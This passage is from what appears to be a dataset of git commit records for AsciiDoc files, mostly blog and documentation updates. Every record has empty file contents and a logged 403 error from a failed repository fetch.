2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed1c7cc8f50c5afa07ec2678eca01adbc14c4fba","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e2e347447d9a9e6ed05de9da0a168b60cce1d64","subject":"Add changes file.","message":"Add changes file.\n","repos":"funcool\/buddy-sign","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/buddy-sign.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f23679908eb404bb62649761821a92c93481a906","subject":"Update 2014-04-30-Coding-rules.adoc","message":"Update 2014-04-30-Coding-rules.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-04-30-Coding-rules.adoc","new_file":"_posts\/2014-04-30-Coding-rules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f740af7cdadedd8f19bed420578be18fa89d5ef0","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee0cb7716d5fad8641821956e757b037c3594c3b","subject":"arc42 with lower-case \"a\", added link to arc42.org","message":"arc42 with lower-case \"a\", added link to arc42.org","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/02_install.adoc","new_file":"src\/docs\/manual\/02_install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5196fcae79d4272ef1bf0e8d2d90dde122699e21","subject":"Added more concept info","message":"Added more concept info\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dafde175f81c16043407be8b5d5e2d427fe2b64","subject":"Create errata.adoc","message":"Create errata.adoc","repos":"the1forte\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"docs\/errata.adoc","new_file":"docs\/errata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a059c5f3c96adce5d3f28276475249e92b82f81","subject":"s\/\\’\/'\/g","message":"s\/\\’\/'\/g\n","repos":"OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cf5029a4ca39342df39ec656a4c6b0595753bd98","subject":"Update 2017-11-18-Oyku.adoc","message":"Update 2017-11-18-Oyku.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-11-18-Oyku.adoc","new_file":"_posts\/2017-11-18-Oyku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a997e1c0d9a24ee3f1de514d311227b9668ae746","subject":"Deleted _posts\/2016-10-27-Demo.adoc","message":"Deleted _posts\/2016-10-27-Demo.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Demo.adoc","new_file":"_posts\/2016-10-27-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0181d4351b469dbe899b8921d35a484406ae1052","subject":"Update 2019-03-16-Cirq.adoc","message":"Update 2019-03-16-Cirq.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-16-Cirq.adoc","new_file":"_posts\/2019-03-16-Cirq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1dcfcdedc7a3279d45b2f265a4c6c101754da78","subject":"Update 2006-08-01.adoc","message":"Update 2006-08-01.adoc","repos":"realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io","old_file":"_posts\/2006-08-01.adoc","new_file":"_posts\/2006-08-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/realraindust\/realraindust.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bed4b8bac2ee5e331d0d0bcff96e499d7b8de3d6","subject":"fix https:\/\/github.com\/docker\/labs\/issues\/242","message":"fix https:\/\/github.com\/docker\/labs\/issues\/242\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"608e539967ea6a539bc38ff940aa0db6a4eff36c","subject":"Add readme to carvel","message":"Add readme to carvel\n","repos":"jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow","old_file":"src\/carvel\/README.adoc","new_file":"src\/carvel\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jvalkeal\/spring-cloud-data.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c736e968a1879cf068d90e1fd2a61a4e86c67e10","subject":"Update 2015-11-05-Dive-into-Python-3.adoc","message":"Update 2015-11-05-Dive-into-Python-3.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7351f922cf1b6f6d74a52e22b065d4333bda100","subject":"Update 2016-03-31-Decompile-me-basic.adoc","message":"Update 2016-03-31-Decompile-me-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08517a4ffe236f0bf0cfd9304b5a7678dca01b6b","subject":"Update 2017-05-28-Naming-Conventions.adoc","message":"Update 2017-05-28-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd85085b1f633386961dd7f5991f472a3898c1fa","subject":"Update 2017-09-19-Gold-Plated-Architecture.adoc","message":"Update 2017-09-19-Gold-Plated-Architecture.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2017-09-19-Gold-Plated-Architecture.adoc","new_file":"_posts\/2017-09-19-Gold-Plated-Architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"837a3213ef05e77a63423982c5307553c53e29a3","subject":"Update 2018-02-26-Undoing-changes-with-Git.adoc","message":"Update 2018-02-26-Undoing-changes-with-Git.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-02-26-Undoing-changes-with-Git.adoc","new_file":"_posts\/2018-02-26-Undoing-changes-with-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75311e23b1c9876b4fe463a3336f32e8e5990856","subject":"Basic exs Eclipse","message":"Basic exs Eclipse\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71798e80b532df9d34cc3aa6d7a149c61dc216c7","subject":"moved version matrix","message":"moved version matrix","repos":"neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68c85ac41261be108c26149de1db9d418023bb3e","subject":"added","message":"added\n","repos":"m-m-m\/service","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9743a48a1bd0394f19c54ee938c6395a80f3cd8","subject":"The very first documentation file","message":"The very first documentation file\n\nChange-Id: Ie13d3eec555bca1a138fb69444aa429308fc9b3b\n","repos":"Darsstar\/framework,mstahv\/framework,jdahlstrom\/vaadin.react,kironapublic\/vaadin,Darsstar\/framework,peterl1084\/framework,mstahv\/framework,mstahv\/framework,peterl1084\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,Legioth\/vaadin,asashour\/framework,kironapublic\/vaadin,jdahlstrom\/vaadin.react,kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,asashour\/framework,peterl1084\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,asashour\/framework,Legioth\/vaadin,asashour\/framework,asashour\/framework,jdahlstrom\/vaadin.react,Legioth\/vaadin,kironapublic\/vaadin,Legioth\/vaadin,peterl1084\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework","old_file":"documentation\/book-preface.asciidoc","new_file":"documentation\/book-preface.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"091508f6d1d758ca371852fc41470976f7a99b31","subject":"y2b create post The Best Wireless Headphones You Can Buy Right Now","message":"y2b create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-02-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2018-02-02-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26a92d406baf123b765db57012bbcea9ca671262","subject":"Update 2020-05-12-My-git-cheatsheet.adoc","message":"Update 2020-05-12-My-git-cheatsheet.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-12-My-git-cheatsheet.adoc","new_file":"_posts\/2020-05-12-My-git-cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"593172cef7146ba9c8f0c754eda48cbf739f4de6","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bccb952579e2d8bcdc6402b7e6501bbe6e910dfd","subject":"Dev notes","message":"Dev notes\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"DEVELOPMENT.adoc","new_file":"DEVELOPMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"259ef2caded3b598fb049f91c54948e46dce2238","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c272ffa1325cc0e6bc60b97b39d4ab57b5603b4","subject":"Update 2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","message":"Update 2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","new_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21ad732ef6c0d1261340865e2d65b7f412c0ae60","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1998ce4f1c2b784836d4ca7781e5bdbd8d9f77e6","subject":"Renamed '_posts\/2018-05-14-Spacemacs.adoc' to '_posts\/2018-05-16-Spacemacs.adoc'","message":"Renamed '_posts\/2018-05-14-Spacemacs.adoc' to '_posts\/2018-05-16-Spacemacs.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-05-16-Spacemacs.adoc","new_file":"_posts\/2018-05-16-Spacemacs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2defb8fdefc997131e9bee611fe3d1dac2d8611","subject":"Blog post related to Hawkular BTM 0.5.0.Final release and demo monitoring JBoss Ticket Monster app","message":"Blog post related to Hawkular BTM 0.5.0.Final release and demo monitoring JBoss Ticket Monster app\n","repos":"jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/11\/10\/hawkular-btm-0-5-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/11\/10\/hawkular-btm-0-5-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16fdedaf43b4dceaa8b6965169d746faf8125628","subject":"Update 2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","message":"Update 2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","repos":"srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io","old_file":"_posts\/2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","new_file":"_posts\/2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srevereault\/srevereault.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ed5926820ae2a34f0cc0bde1f582a1a472227e6","subject":"Update 2017-09-14-How-to-type-fast-like-a-pro.adoc","message":"Update 2017-09-14-How-to-type-fast-like-a-pro.adoc","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc","new_file":"_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d6335947a10f9596457b8d826f63ef8f33b8154","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4c76345d0a9d4eeb7fc5eed4a1f0401f04a4e0e","subject":"HashMap\u5206\u6790\u4e8c","message":"HashMap\u5206\u6790\u4e8c\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"HashMap(\u4e8c).adoc","new_file":"HashMap(\u4e8c).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b025e40aed191cdec6dbf49fe505fe0516c2a59","subject":"Update 2016-01-06-bGC2-is-Brand-New.adoc","message":"Update 2016-01-06-bGC2-is-Brand-New.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-06-bGC2-is-Brand-New.adoc","new_file":"_posts\/2016-01-06-bGC2-is-Brand-New.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"590bbbb16aa97368033dd09c7cfbae3907ee7779","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a2686d00b37ae70c277cd48023aae67af1dd3bb","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffb434ef9a9369bcc1dd6add1883938a1da6b9fe","subject":"Update 2017-08-05-accordion-menu.adoc","message":"Update 2017-08-05-accordion-menu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-accordion-menu.adoc","new_file":"_posts\/2017-08-05-accordion-menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74c9023c92cba511d63e17bbe632eb0c8feed7e0","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65b18fa6fe27ad531dbdbbaa8f27c445fe11e4ca","subject":"KUDU-1303 Document code style guidelines for C++11 move semantics and rvalue references","message":"KUDU-1303 Document code style guidelines for C++11 move semantics and rvalue references\n\nChange-Id: Iad1580a0fdb46c25af3af4fa61e250a0904b376a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3639\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63ef9b3714c9410dd1b5a55e3bd50de49f23dfcb","subject":"doc: shm: defining behaviour when blocks have same name","message":"doc: shm: defining behaviour when blocks have same name\n\nDefining the reserve and lookup behaviour when multiple blocks are reserved\nusing the same name.\n\nSigned-off-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nReviewed-by: Bill Fischofer 